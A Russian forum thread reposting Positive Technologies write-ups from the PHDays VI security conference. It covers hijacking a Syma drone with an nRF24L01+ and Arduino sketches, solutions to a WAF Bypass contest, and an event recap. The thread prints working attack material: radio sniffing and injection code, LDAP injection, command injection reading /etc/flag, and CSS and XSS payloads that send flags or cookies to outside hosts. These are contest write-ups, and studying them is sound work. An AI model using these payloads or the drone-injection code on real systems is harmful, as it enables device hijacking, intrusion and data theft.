    Фактически дело сделано, высокий уровень — единица, низкий — ноль. А по таймлайну можно определить период импульса и посчитать битрейт.

    В самом начале передатчик настраивается на частоту передачи и передает только несущую, затем идет преамбула, состоящая из последовательности 0 и 1, в разных чипах она может отличаться как длиной, так и содержанием, в nRF24L01+ она составляет 1 байт 0xAA или 0x55, в зависимости от старшего бита адреса, в нашем случае преамбула 0xAA. Затем идут байты адреса, в nRF24L01+ адрес может составлять от 3 до 5 байт (забегая вперед: это не совсем так).

    [​IMG]

    Теперь мы знаем адрес (0xa20009890f). Для дальнейшего анализа необходимо сделать небольшую автоматизацию, например так:

    [​IMG]

    На выходе получится файл, состоящий из последовательности 0 и 1:

    $ hexdump -C test3.raw



    Один из наших пакетов можно найти по смещению 0x5e25:

    [​IMG]

    Что с этим делать дальше — каждый решит для себя сам, но необходимо подобрать длину пакета и тип используемой CRC. Мы написали утилиту, которая анализирует файл и пытается найти преамбулу, после которой пытается подсчитать CRC для разных вариантов длины payload и адреса двумя разными способами (см. даташит). У нас получилось так:

    [​IMG]

    Однако позже пришло понимание, что Python годится только для анализа в офлайне, а «переваривать» данные в реальном времени с битрейтом даже 250 Кбит/с весьма проблематично, не говоря уже о более высоких скоростях. Так родилась вторая версия на C, которая работает в режиме реального времени.

    [​IMG]

    Итак, имея payload, остается разобраться уже в самом протоколе Syma.

    Путь нищеброда — Arduino и nRF24L01+

    [​IMG]

    Этот способ, в отличие от описанного выше, не требует практически никаких знаний в области радио, и стоит крайне дешево (Arduino — 2 $, nRF24L01+ — 1 $ и примерно столько же на провода mini-USB и DuPont), однако требует некоторой смекалки и навыков гугления. Именно его участникам конкурса мы и предлагали повторить.

    Основная проблема в том, что nrf24l01+ не имеет promiscuous режима. Однако сам модуль имеет несколько странных особенностей, первая — в даташите есть интересная вещь:

    [​IMG]

    Если выставить этот регистр в «00», то адрес будет 2 байта. Далее есть еще одна интересная особенность: обычно преамбула передается и используется для того, чтобы приемник мог подстроиться под передатчик, именно для этого чаще всего в качестве преамбулы передается последовательность нулей и единиц. Вторая особенность модуля nRF24L01+: он не ищет преамбулу и никак ее не использует, он ищет адрес, который записан в качестве принимаемого. Если посмотреть на передаваемый сигнал на скриншотах выше, можно также заметить, что перед началом передачи преамбулы передатчик вещает несущую; опытным путем было выявлено, что чаще всего nRF24L01+ воспринимает ее как 0x00 (иногда как 0xFF, реже как случайный байт). Таким образом, используя эти недокументированные особенности мы можем перевести nRF24L01+ в promiscuous mode — установив длину адреса в 2 байта, а сам адрес как 0x00AA или 0x0055. В одном из вариантов мы будем получать данные, сдвинутые на 1 бит. Кроме того, можно принимать данные без проверки CRC.

    Теперь у нас есть все необходимые теоретические знания. Используем библиотеку RF24 (github.com/TMRh20/RF24), хотя в ней есть недостаток: в файле RF24.cpp в функции

    Код:
    void RF24::setAddressWidth(uint8_t a_width){
        if(a_width -= 2){
            write_register(SETUP_AW,a_width%4);
            addr_width = (a_width%4) + 2;
        }
    }
    
    следует удалить проверку валидности:

    Код:
    void RF24::setAddressWidth(uint8_t a_width){
        a_width -= 2;
        write_register(SETUP_AW,a_width%4);
        addr_width = (a_width%4) + 2;
    }
    

    Теперь пишем небольшой скетч для Arduino (данный пример для Mega, но будет работать на любой другой, нужно просто поменять CE_PIN, CSN_PIN на свои):
    Код:
    #include <SPI.h>
    #include <nRF24L01.h>
    #include <RF24.h>
    #include <printf.h>
    
    #define CE_PIN  53     /// Change it for your board
    #define CSN_PIN 48     /// Change it for your board
    
    RF24 radio(CE_PIN, CSN_PIN);
    
    const char tohex[] = {'0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'};
    uint64_t pipe = 0x00AA;
    
    byte buff[32];
    byte chan=0;
    byte len = 32;
    byte addr_len = 2;
    
    void set_nrf(){
      radio.setDataRate(RF24_250KBPS);
      radio.setCRCLength(RF24_CRC_DISABLED);
      radio.setAddressWidth(addr_len);
      radio.setPayloadSize(len);
      radio.setChannel(chan);
      radio.openReadingPipe(1, pipe);
      radio.startListening();
    }
    
    void setup() {
      Serial.begin(2000000);
      printf_begin();
      radio.begin();
      set_nrf();
    }
    
    long t1 = 0;
    long t2 = 0;
    long tr = 0;
    
    void loop() {
      byte in;
       if (Serial.available() >0) {
         in = Serial.read();
         if (in == 'w') {
          chan+=1;
          radio.setChannel(chan);
          Serial.print("\nSet chan: ");
          Serial.print(chan);
         }
         if (in == 's') {
          chan-=1;
          radio.setChannel(chan);
          Serial.print("\nSet chan: ");
          Serial.print(chan);
         }
         if (in == 'q') {
         Serial.print("\n");
         radio.printDetails();
         }
       }
      while (radio.available()) {                 
        t2 = t1;
        t1 = micros();
        tr+=1;
        radio.read(&buff, sizeof(buff) );
        Serial.print("\n");
        Serial.print(tr);
        Serial.print("\tms: ");
        Serial.print(millis());
        Serial.print("\tCh: ");
        Serial.print(chan);
        Serial.print("\tGet data: ");
        for (byte i=0; i<len;i++ ){
          Serial.print(tohex[(byte)buff[i]>>4]);
          Serial.print(tohex[(byte)buff[i]&0x0f]); 
        }
      }
    }
    
    Теперь можно на серийном порте забирать готовые данные с установленного канала, смена канала осуществляется посылкой «w» и «s» в порт. Дальнейшую обработку можно производить любым удобным способом: глазами, руками, скриптами. Следует обратить внимание, что скорость порта нестандартная — 2 Мбит/c, это необходимо для того, чтобы Arduino меньше времени занималась I/O, а больше занималась делом (не забываем, что там всего лишь 16 МГц).

    [​IMG]

    После нахождения канала и поимки адреса следует установить этот адрес в качестве приемного, чтобы отфильтровать данные из космоса:
    Код:
    uint64_t pipe = 0xa20009890fLL;
    byte addr_len = 5;
    
    [​IMG]

    Затем следует пробежаться по всем каналам и найти все, на которых проскакивает данный адрес. Немного наблюдаем за происходящим и замечаем, что 10, 11 и 12 байт меняются в зависимости от данных, а за ними идет последовательность случайных байтов — шум. Пробуем включить CRC16 (два последних байта) и сменить длину пакета до 10 байт:
    Код:
    byte len = 10;
    radio.setCRCLength(RF24_CRC_16);
    
    [​IMG]

    Бинго! Мы смогли подобрать все необходимые настройки nRF24L01+, которые используются данным пультом, дальше дело за разбором протокола самой Syma.

    Протокол Syma

    Разобрать его совсем не сложно, записав немного активности с пульта.

    • Первый байт — значение throttle (стик газа)
    • Второй байт — значение elevator (тангаж — наклон вперед-назад), где старший бит — направление (вперед или назад), а остальные 7 — значение.
    • Третий байт — значение rudder (рысканье — поворот вокруг оси влево-вправо), где старший бит — направление (влево или вправо), а остальные 7 — значение.
    • Четвертый байт — значение aileron (крен — наклон влево-вправо), где старший бит — направление, а остальные 7 — значение.
    • Десятый байт это CRC, которая рассчитывается как XOR от первых 9 байт + 0x55, понять это — пожалуй, самое сложное.

    Остальные байты можно оставить такими же, как и перехваченные, там передаются значения регулировок нулевого положения (тримы), и несколько флагов, относящихся к работе камеры.

    Осталось сформировать какой-либо валидный пакет, например заставим дрона крутиться вокруг своей оси против часовой стрелки: 92007f000040002400de

    Ниже приведен скетч нашего перехватчика с PHDays, который выглядел вот так:

    [​IMG]
    Код:
    #include <SPI.h>
    #include <nRF24L01.h>
    #include <RF24.h>
    #include <stdio.h>
    
    #define CE_PIN  48
    #define CSN_PIN 53
    
    //// syma
    uint8_t chan[4] = {25,41,57,73};
    const char tohex[] = {'0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'};
    uint64_t pipe = 0xa20009890fLL;
    
    RF24 radio(CE_PIN, CSN_PIN);
    int8_t packet[10];
    int joy_raw[7];
    byte ch=0;
    
    //// controls
    uint8_t throttle = 0;
    int8_t rudder = 0;
    int8_t elevator = 0;
    int8_t aileron = 0;
    
    //// syma checksum
    uint8_t checksum(){
        uint8_t sum = packet[0];
        for (int i=1; i < 9; i++) sum ^= packet[i];
        return (sum + 0x55);
    }
    
    //// initial
    void setup() {
      //set nrf
      radio.begin();
      radio.setDataRate(RF24_250KBPS);
      radio.setCRCLength(RF24_CRC_16);
      radio.setPALevel(RF24_PA_MAX);
      radio.setAutoAck(false);
      radio.setRetries(0,0);
      radio.setAddressWidth(5);
      radio.openWritingPipe(pipe);
      radio.setPayloadSize(10);
      radio.setChannel(25);
      //set joystick
      pinMode(A0, INPUT);
      pinMode(A1, INPUT);
      pinMode(A2, INPUT);
      pinMode(A3, INPUT);
      pinMode(A4, INPUT);
      pinMode(A5, INPUT);
      pinMode(A6, INPUT);
      digitalWrite(A3, HIGH);
      digitalWrite(A4, HIGH);
      digitalWrite(A5, HIGH);
      digitalWrite(A6, HIGH);
      //init default data
      packet[0] = 0x00;
      packet[1] = 0x00;
      packet[2] = 0x00;
      packet[3] = 0x00;
      packet[4] = 0x00;
      packet[5] = 0x40;
      packet[6] = 0x00;
      packet[7] = 0x21;
      packet[8] = 0x00;
      packet[9] = checksum();
    }
    
    void read_logitech() {
      joy_raw[0] = analogRead(A0);
      joy_raw[1] = analogRead(A1);
      joy_raw[2] = analogRead(A2);
      joy_raw[3] = !digitalRead(A3);
      joy_raw[4] = !digitalRead(A4);
      joy_raw[5] = !digitalRead(A6);
      joy_raw[6] = !digitalRead(A5);
      //little calibration
      joy_raw[0] = map(joy_raw[0],150, 840, 255, 0)+10;
      joy_raw[0] = constrain(joy_raw[0], 0, 254);
      joy_raw[1] = map(joy_raw[1],140, 830, 0, 255);
      joy_raw[1] = constrain(joy_raw[1], 0, 254);
      joy_raw[2] = map(joy_raw[2],130, 720, 255, 0);
      joy_raw[2] = constrain(joy_raw[2], 0, 254);
    }
    
    //// main loop
    void loop() {
      read_logitech();
      throttle = joy_raw[2];
      rudder = 64*joy_raw[4] - 64*joy_raw[5];
      elevator = joy_raw[1]-127;
      aileron = joy_raw[0]-127;
      radio.openWritingPipe(pipe);
      ch +=1;
      if (ch>3) ch = 0;
      radio.setChannel(chan[ch]); 
      packet[0] = throttle;
      if (elevator < 0) packet[1] = abs(elevator) | 0x80; else packet[1] = elevator;
      if (rudder < 0) packet[2] = abs(rudder) | 0x80; else packet[2] = rudder;
      if (aileron < 0) packet[3] = abs(aileron) | 0x80; else packet[3] = aileron;
      packet[4] = 0x00;
      packet[5] = 0x40;
      packet[6] = 0x00;
      packet[7] = 0x21;
      packet[8] = 0x00;
      packet[9] = checksum();
      radio.write( packet, sizeof(packet) );
    }
    
    Если нет желания разбираться с Arduino, можно собрать на этой же библиотеке программу-перехватчик на Raspberry Pi.

    [​IMG]

    Готовые файлы для Raspberry — github.com/chopengauer/nrf_analyze.

    Участники и победители

    За два дня конференции в конкурсе приняли участие полтора десятка человек. Заинтересовавшихся было гораздо больше, но многие, узнав, что ломать нужно не Wi-Fi, разочарованно уходили. Многие боятся браться за что-то новое и непонятное, на этом и держится защищенность современного интернета вещей.

    Среди участников были те, кто уже строил свои беспроводные сети на nRF24L01+, и те, кто их видел в первый раз.

    Уже в середине первого дня один из участников произвел первые попытки воздействия на дрон методом записи сигнала пульта с последующим его воспроизведением, используя SDR (replay-атака). Однако дрон от этого лишь слегка дергался как от помехи. Эта атака бесполезна по причине того, что дрон использует 4 канала с разницей между верхним и нижним в 48 МГц, и воздействия по одному каналу недостаточно для угона.

    Уже к вечеру первого дня один из участников обладал всеми необходимыми знаниями об особенностях модуля (двухбайтный адрес 0x00aa) и пытался отсканировать адрес нашего пульта, но проблема была в том, что ему попался даташит от устаревшей версии чипа nRF24L01 (без +), который не поддерживает используемый нашим дроном битрейт 250 Кбит/с. А еще он отказался использовать готовые библиотеки для работы с модулем и работал напрямую с его регистрами. Только хардкор! Ломаем ноги только об свои велосипеды ;)

    Победителем конкурса стал Глеб Чербов, которому удалось полностью перехватить управление дроном к 16 часам второго дня. Остальным участникам не удалось перехватить адрес устройства.



    Автор: Positive Technologies

     
  17. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    TS
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    [​IMG]

    В рамках международного форума по практической безопасностиPositive Hack Days в очередной раз состоялся конкурс WAF Bypass. Как и прежде, задачей участников было решение заданий путем обхода проверок PT Application Firewall, защищавшего уязвимые веб-приложения. Каждое из заданий подразумевало заложенные нами варианты обхода, которые были возможны из-за специально допущенных ошибок в конфигурации. Цель каждого задания — получить флаг, который мог храниться в базе данных, в файловой системе или в Cookie, выдаваемых специальному боту. Описание заданий и способы их решения под катом.

    1. m0n0l1th

    В этом задании участникам было необходимо провести LDAP-инъекцию и извлечь пароль администратора из LDAP-хранилища. Имелась форма ввода имени пользователя, которое напрямую попадало в запрос к LDAP.

    [​IMG]

    Стандартные вектора вроде admin)(|(password=*) блокировались регулярным выражением, однако обход был возможен при использовании пробельных символов между операндами в запросе:


    Далее, для получения пароля было необходимо применить метод подбора для каждого символа:

    Код:
    admin)(%0a|(password=a*)
    admin)(%0a|(password=a3*)
    admin)(%0a|(password=a3b*)
    admin)(%0a|(password=a3b8*)
    admin)(%0a|(password=a3b8b*)
    admin)(%0a|(password=a3b8ba*)
    
    ...
    2. p0tat0

    Открыв задание, участник получал следующую страницу:

    [​IMG]

    Часть HTML-кода была при этом такой:
    HTML:
    <title>Caesar was here</title><link href="/index.php/../styles.css" rel="stylesheet"><meta content="browser bot has flag ;)" name="flag"><script src="/index.php/../scripts.js"></script>

    На что здесь необходимо обратить внимание? В первую очередь, на объявление переходного синтаксиса HTML в DOCTYPE. Это значит, что будет работать нестрогий парсинг CSS. Вторая особенность — это наличие флага между тэгами link и script и отсутствие переводов строк.

    Казалось бы, атакующий не может как-то повлиять на эту статичную страничку, однако если отправить запрос вида /index.php/test, то можно было увидеть, что путь отражается в тэгах link и script. При этом отображается та же страница вместо ошибки 404. Это возможно благодаря особенностям работы веб-сервера Apache (впрочем, такое поведение присутствует не только у него).

    Очень похоже на XSS, однако любые кавычки и открывающие тэги экранировались. Для решения этого задания было необходимо применить другой способ, а именно Relative Path Overwrite. RPO эксплуатирует нестрогий парсинг CSS в браузерах, что позволяет заставить жертву корректно интерпретировать инъекцию CSS-стилей в HTML-документе. Внедренные CSS-стили могут использоваться для отправки персональных данных пользователя на сторонний сервер. Сама инъекция происходит через путь:

    Код:
    /index.php/%250a*%7B%7D%250abody%7Bbackground:red%7D%250a/

    При таком запросе браузер подгрузит CSS-стиль по пути:

    Код:
    /index.php/%0a*{}%0abody{background:red}%0a//../styles.css
    В ответе среди HTML-кода браузер увидит валидные CSS-стили:

    HTML:
    <link href="/index.php/ &lt;br&gt;
    *{}&lt;br&gt;
    body{background:red}&lt;br&gt;
    /styles.css/../styles.css" rel="stylesheet">
    Боевой эксплоит для данного задания подразумевает использование CSS-свойств, которые позволят отправить на сторонний сервер флаг, находящийся между двумя фрагментами текста под контролем атакующего. Пример:

    Код:
    /index.php/')%7D%250a%250a*%7B%7D%250abody%7Bbackground:url('http://test.com/

    Однако в задании мы запретили ключевые слова CSS-свойств, которые позволяют сделать запрос на другой сайт:

    • import
    • content
    • image
    • background
    • font
    Но не все :) Если посмотреть все известные способы, перечисленные в проекте HTTP Leaks, а также обратить внимание, что в исходном коде присутствует список, то можно было обнаружить, что свойство list-style не блокируется:

    Код:
    /index.php/')%7D%250a%250a*%7B%7D%250abody%7Blist-style:url('http://test.com/
    Такой запрос заставит бота на PhantomJS отправить флаг:

    [​IMG]

    3. d3rr0r1m

    По традиции в рамках конкурса WAF Bypass было задание на обход XXE — инъекцию внешних сущностей XML. Однако в этот раз никому не удалось обойти наши проверки и найти заложенный обход. Блокировались любые вариации инъекции — через внешние обычные сущности, параметрические сущности, DOCTYPE и др. Внимание надо было обратить на обработку XML в разных кодировках — если закодировать тело в UTF-16 Big Endian командой cat x.xml | iconv -f UTF-8 -t UTF-16BE > x16.xml, при этом удалив BOM-метку, то можно было обойти проверки и прочитать флаг из файловой системы.

    [​IMG]

    4. f0dn3

    В данном задании участник получал доступ к простому ToDo-менеджеру, который умел сохранять и восстанавливать из файла список дел:

    [​IMG]

    Если открыть этот файл в hex-редакторе, то можно было сразу понять, что внутри сериализованный Java-объект (по magic-байтам 0xac 0xed в начале).

    [​IMG]

    Десериализация Java-объектов, поступающих от пользователя, при наличии уязвимых библиотек может привести к выполнению произвольных команд на сервере. В CLASSPATH мы специально включили commons-collections 4, позволяющий провести RCE. Однако на стороне PT Application Firewall мы запретили две строки, которые присутствуют в эксплоитах ysoserial, являющимся популярным инструментом для реализации данной уязвимости. Первая строка — это собственно «ysoserial», а вторая — «iTransformers», которая присутствует в трех их пяти эксплоитов ysoserial. Для решения задания было необходимо переименовать классы и имена пакетов, исключив строку «ysoserial», при этом воспользовавшись одним из эксплоитов без строки «iTransformers».

    [​IMG]

    5. n0ctf

    На странице задания присутствовал простой ping-сервис с формой ввода IP-адреса. Как же здесь не попробовать кавычку? И, действительно, пользовательcкие данные напрямую попадали в вызов системных команд. Несмотря на то, что большинство способов внедрения команд блокировались, были возможны следующие варианты:

    Код:
    8.8.8.8|${IFS}cat /etc/flag
    -c 1 ya.ru;/*in/cat /etc/flag
    1.2.3.4|${a-cat /etc/flag}
    [​IMG]

    6. c1tyf

    Для решения этого задания было необходимо обойти проверку на Cross-Site Scripting в контексте JavaScript-кода. Алгоритм проверки был описан мной и Денисом Колеговым в рамках нашего доклада "Waf.js: как защищать веб-приложения с помощью JavaScript", который мы представили на Positive Hack Days VI. Вкратце, мы пытаемся подставить пользовательские данные в различные контексты и распарсить то, что получилось как JavaScript-код. Если AST-дерево построено, и в нем пристутствуют запрещенные ноды, то блокируем такой запрос. Например, простейший вариант "+alert(1)+" будет заблокирован, так как после подстановки в контекст с двойными кавычками в AST-дереве появится запрещнный узел CallExpression. Однако для конкурса в списке запрещенных узлов отсутствовал узел WithStatement, что позволяло обойти проверку с помощью оператора with:

    Код:
    http://c1tyf.waf-bypass.phdays.com/?name=\"};with(window){onload=function(){ with(document){k=cookie;};with(window){location='http://robotsfreedom.com/phdays/?a=test'+k;};}}//;
    And the winner is...

    Победителем конкурса в третий раз подряд стал Георгий Носеевич (@webpentest), в качестве приза ему достался iPad Air 2. Второе место занял другой постоянный участник конкурса Иван Новиков (d0znpp), он был награжден годовой лицензий Burp Suite Pro. Третье же место и сувенирная продукция PHDays достались Владасу Булавасу (vladvis).

    И напоследок немного пирожков. В ходе конкурса были заблокированы 31412 запросов.

    Распределение по категориям атак:

    [​IMG]

    Распределение по заданиям:

    [​IMG]

    Автор: Positive Technologies

    Спасибо призерам и всем, кто участвовал!

    Арсений Реутов (Raz0r), Игорь Каныгин (akamajoris), Дмитрий Нагибин, Денис Колегов, Николай Ткаченко, Павел Свиридов и PT Application Firewall Team.
     
  18. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    TS
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    Итоги PHDays VI

    [​IMG]

    Отгремел Positive Hack Days VI. Теперь, когда его события уже стали страницей прошлого, самое время подвести итоги и наметить курс на следующий год. Лейтмотивом шестого PHDays стало противостояние: идея, которая с первых дней создания PHDays бродила в головах организаторов, наконец-то нашла свое воплощение в виде «PHDays VI СityF: Противостояние». Ключевой конкурс форума из узкоспециализированной хакерской игры превратился в двухдневную мегабитву.

    Первая попытка сменить паруса и приблизить практические соревнования к реальной жизни была предпринята еще в прошлом году, на пятом PHDays. По сюжету каждая команда CTF представляла собой группировку, действующую в вымышленном государстве. Все события были завязаны на подпольной бирже труда, на которой участники получали заказы на взлом тех или иных объектов. В этом году создатели форума пошли дальше и разбавили хакерский междусобойчик командами защитников и экспертных центров безопасности (SOC). С легкой руки организаторов в игру были вовлечены реальные представители мира информационной безопасности — те, кто в жизни строят системы защиты, противодействует атакам, расследует инциденты.

    [​IMG]«Как правило, в CTF принимают участие только хакерские команды. В то время как люди, отвечающие за безопасность реальных объектов, например, интеграторы, SOC, ИБ-эксперты, не участвуют в этом соревновании. Большая часть ИБ-индустрии была вне игры. Задачей "PHDays VI СityF: Противостояние" было сделать так, чтобы как можно больше людей увидели практическую сторону безопасности. Нам показался очень интересным формат, когда узкоспециализированные команды защиты и нападения занимаются тем, в чем они мастера: команды защитников и SOC строят системы защиты и отбиваются от атак, а хакеры нападают», — комментирует Борис Симис, заместитель гендиректора Positive Technologies по развитию бизнеса.

    Консультант по безопасности Cisco Алексей Лукацкий отмечает, что прошедшее мероприятие — это своего рода «новое слово в организации мероприятий по реальной кибербезопасности». «CityF отличается от традиционных киберучений и CTF, живущих по определенным сценариям, тем, что в противостоянии участвовали обе стороны. По сути речь идет о принципе red team vs blue team, когда одна команда атакует компанию, а другая ее защищает. В случае с CityF в качестве такой компании был выбран построенный мини-город, а в качестве красных и синих команд — представители рынка ИБ, которые могли на деле, а не на словах продемонстрировать свои компетенции в обеспечении информационной безопасности», — поясняет он.

    Москва не сразу строилась…

    Все события разворачивались в некотором городе F, который функционально практически ничем не отличался от обычного миллионника. В нем работали банк, телеком-оператор, электроэнергетическая компания, офис крупного холдинга и «умный» дом. На территории города был развернут собственный интернет с новостными и развлекательными сайтами и соцсетями.

    Создатель сотворил мир за шесть дней, однако на возведение города F времени ушло куда больше — целых полгода понадобилось «строителям». Благодаря совместным усилиям организаторов и партнеров в рекордные сроки удалось развернуть все макеты и стенды, которые по технической части были максимально приближены к жизни. Получилась на удивление сложная с точки зрения информационной безопасности инфраструктура.

    [​IMG] Рассказывает менеджер по продвижению продуктов Positive Technologies, член оргкомитета PHDays, член оргкомитета PHDays Михаил Левин: «По вычислительным мощностям это был реальный город. Нам потребовались колоссальные ресурсы — сетевое, серверное, программное обеспечение. Мы построили город собственными усилиями, но, конечно, огромную поддержку нам оказали и наши партнеры — компании Cisco и Check Point, которые предоставили необходимое оборудование, а также активно помогали в его установке и настройке».

    В частности, были использованы новые решения: контроллер Cisco APIC (Cisco Application Policy Infrastructure Controller), коммутаторы Cisco Nexus 9000, файрвол Cisco ASA 5585, Check Point Next Generation Firewall.

    «С компанией Positive Technologies нас связывают давние отношения — не только профессиональные, но и дружественные. Поэтому мы с радостью и уже не первый год помогаем в организации технической инфраструктуры PHDays. В этом году задача стала более масштабной, так как понадобилось гораздо большее количество сетевого оборудования и серверов, чем это было в прошлом. Но мы справились. Сказать, что мы преследовали какие-то особые или коммерческие цели, я не могу. Просто было желание помочь хорошим людям в организации хорошего дела», — уточняет Алексей Лукацкий.

    Нужно отметить, что в подготовке конкурса приняли участие не только крупные компании — были среди участников и настоящие стартапы. Например, компания Loomoon предоставила банку города CityF свою систему ДБО. Бо́льшую часть макета «умного дома» подготовили компании Advantech и ПРОСОФТ.

    Не менее серьезно подготовились и непосредственные герои противостояния. По условиям игры команды защитников заранее получили доступ к инфраструктуре для настройки средств защиты своих объектов, и здесь для них не было никаких ограничений. Ключевыми инструментами защитников стали проверенные ими на практике межсетевые экраны уровня приложений, средства защиты сетевого периметра, обнаружения и предотвращения атак, средства корреляционного анализа и даже SIEM. Вендоры также были представлены, что называется, в ассортименте: использовались HP ArcSight, IBM QRadar SIEM, Microsoft Operations Management Suite, Qualys, Bot-Trek TDS, система на базе Security Onion, Balabit Shell Control Box, Windows Server Update Services, различные IDS/IPS.

    Впрочем, некоторые из команд защитников и SOC не смогли отказать себе в удовольствии испытать нестандартные решения в боевых условиях CityF. Например, команда False Positive использовала несколько собственных разработок по расследованию инцидентов, а команде You Shall Not Pass пригодились даже старенький телефон Motorola С118 и виртуальная машина Ubuntu для мониторинга GSM-сети.

    Если защитники вооружились не на шутку, то атакующие, напротив, ринулись в бой практически с голыми руками, вооружившись ноутбуками и стандартным хакерским набором. В основном это были инструменты для проведения атак на веб-приложения Burp Suite, сканирования IP-сетей Nmap, захвата и анализа сетевого трафика Wireshark, восстановления паролей Cain & Abel, создания и отладки эксплойтов Metasploit.

    Ломаем по живому

    [​IMG] Противостояние стало вызовом не только для организаторов, но и для участников, которым оказались в новинку и правила, и игровой мир. Абстрактные задачи остались в прошлом, на этот раз перед участниками стояли реальные цели. По словам руководителя отдела безопасности банковских систем Positive Technologies, члена оргкомитета PHDays Тимура Юнусова, «классический CTF, несмотря на все свои преимущества, все же оторван от реальности: все сводится к решению головоломок и выполнению искусственных заданий». Главная же задача, которую преследовали организаторы, — наглядно показать, как на самом деле ломают и защищают живые системы (да еще так, чтобы происходящее было понятно и тем, кто мало знаком с хакерским миром). В качестве заданий хакерам предложили украсть деньги из банка, обеспечить себя безлимитной мобильной связью, устроить аварию на гидроэлектростанции, оставить без света умный дом, а командам защитников и SOC — противостоять атакующим. Собственно, все как в жизни.

    Конечно, любое подобное мероприятие сопряжено с трудностями. К счастью, возникшие сложности удалось преодолеть, и, несмотря на все перипетии, большинство участников положительно оценивают опыт, полученный во время соревнования.

    «Несмотря на некоторый сумбур в организации, связанный как с масштабом мероприятия, так и со сменой формата, мы зарядились драйвом на год вперед. В процессе CityF были некоторые накладки и непонимание правил и принципов определения счета, но награждение сняло все вопросы», — комментирует Иван Мелехин, технический директор компании «Информзащита», которая, между прочим, отправила в CityF целых две команды — izo:SOC и weIZart (защитников и SOC).

    Однако некоторым все-таки не хватило огонька: некоторые хотели посоревноваться не только с хакерами, но и с коллегами по цеху. Конечно же, нашлись и те, кому ближе принципы старого доброго CTF.

    «Впечатления от игры неоднозначные: интересная идея, подготовлены практические задачи, но недостаточно налажено игровое взаимодействие и система очков и штрафов (особенно для защитников)», — считает участник команды Rdot Омар Ганиев. Поддерживает его и участник filthy thr33 Кирилл Шилиманов: «Соревнование оставило смешанные чувства. Первый день для атакующих практически ушел впустую, поскольку к сервисам просто не было доступа. Когда они открылись и начались взломы, стало намного веселее. Отметим, что сервисы были подготовлены сложные, интересные, за что большое спасибо организаторам».

    30-часовая битва

    Противостояние длилось около тридцати часов, это был настоящий марафон по противодействию массированным атакам. В распоряжении участников было пять объектов, которые защищали пять команд защитников и три команды SOC. За два дня судьи зафиксировали от 3 до 20 тысяч событий безопасности на каждом объекте защиты и всего около 200 серьезных атак, большая часть из которых привела к значимым результатам.

    В 99% случаев атаки были сконцентрированы на периметре защищаемых объектов. Как и в реальной жизни, наиболее распространенным вектором стали атаки на веб. Впрочем, это не было сюрпризом для защитников, они заранее предполагали такой ход событий и были готовы к обороне.

    «Мы защищали офисную инфраструктуру, особое внимание уделяя защите веб-серверов. Как оказалось, не зря: хакеры использовали множество инструментов для пентеста, и если с эксплойтами для операционных систем IPS справлялась, то изощренные атаки на веб-серверы и атаки на логику работы приложений можно было обнаружить только в ручном режиме, анализируя логи WAF, веб-серверов и расширенные логи операционных систем», — рассказывает Дмитрий Березин, эксперт по информационной безопасности компании «КРОК», участник команды Green.

    Вопреки ожиданиям защитников, еще один популярный на практике вектор — атаки с использованием социальной инженерии — не был активно задействован участниками противостояния. Лишь одна команда хакеров воспользовалась невнимательностью противника и сфотографировала логины и пароли от внутреннего форума команды защитников. Однако эти данные не привели ни к какому серьезному инциденту. «Мы очень ждали применения социальной инженерии, но атакующие практически не использовали такие технологии», — сокрушается руководитель Solar JSOC компании Solar Security Владимир Дрюков, участник команды False Positive.

    Позже защитники признались, что готовились к худшему, поэтому были вооружены до зубов и подготовили ловушки. Ожидали абсолютно всего: эксплуатации уязвимостей в приложениях, веб-приложениях, ОС и сервисах, ошибок конфигурирования. На деле все оказалось иначе.

    «Наша команда защищала все объекты — рабочие станции операторов, серверы, корпоративную почту, домен, ДБО, системы видеоконференцсвязи, электронного документооборота и обмена мгновенными сообщениями. Значительная часть подготовленных рубежей защиты не пригодилась: хакеры не проникли во внутреннюю сеть. Мы не увидели атак на сетевой протокол аутентификации Kerberos типа Golden Ticket и Pass-the-Hash, атак посредством троянов и бэкдоров. Также хакеры не залезли ни на один подготовленный honeypot. Никто из хакеров даже не попытался сломать уязвимый сервер proFTPD», — рассказывает руководитель направления AST Group Инна Сергиенко, участница команды «ACT».

    Команда False Positive похвасталась, что на защищаемой им инфраструктуре атакующим удалось получить только один флаг: «Организаторы ввели около семи новых сервисов на периметре одновременно, и мы с защитниками немного опоздали с обеспечением профиля безопасности последней системы, настраивая другие шесть. Но недолго атакующие праздновали победу: уже через пару минут нам удалось восстановить состояние системы и ее безопасность».

    Кстати, в рамках игры показала свою эффективность совместная работа команд защитников и SOC. По оценкам судей, все команды SOC собрали наиболее полную картинку происходящего на объектах, в то время как защитники вынуждены были оперативно реагировать на инциденты. Например, в ситуации, когда по условиям игры защитники промышленных систем выключили защиту, команда SOC, осуществляющая мониторинг промышленной системы, подробно изучила действия атакующих, начало атаки, ее реализацию. В реальной жизни это бы соответствовало возможности оперативных действий по пресечению атак даже без вмешательств инструментов защиты.

    [​IMG]

    «Команда "Информзащиты" защищала гидроэлектростанцию и подстанции 500 и 10 кВ. По сценарию игры вечером первого дня соревнования мы начали ослаблять защиту, к концу дня практически все СЗИ были выключены. Только SOC осуществлял мониторинг. За время пока объект был под защитой, ни одной успешной атаки на инфраструктуру проведено не было. Все остальные взломы и затопления происходили тогда, когда инфраструктура была не защищена», — комментирует события участник Иван Мелехин.

    Итого хакерам успешно удалось:

    • угнать учетные записи, в том числе несколько доменных;
    • провести атаки на физическое оборудование АСУ (был проведен сброс воды, отключены линии, сожжены провода ЛЭП);
    • проникнуть в технологическую сеть АСУ через уязвимости корпоративной сети;
    • провести сетевые атаки на системы умного дома (отключить оборудование от сети);
    • украсть деньги из банка (около 22 000 рублей) и получить данные банковских карт;
    • украсть и в некоторых случаях удалить резервные копии системных файлов, дисков, архивов, принадлежащие офису CorpF;
    • провести атаки на GSM/SS7 с последующей кражей денег путем подделки USSD-запросов;
    • провести взаимные атаки как на сотрудников команды защиты, так и на команды нападающих (хакеры, используя методы социнженерии, украли пароль от форума защитников, а команда защитников Vulners взломала компьютеры хакеров);
    • провести дефейсы множества веб-ресурсов, в их числе сайт офиса CorpF;
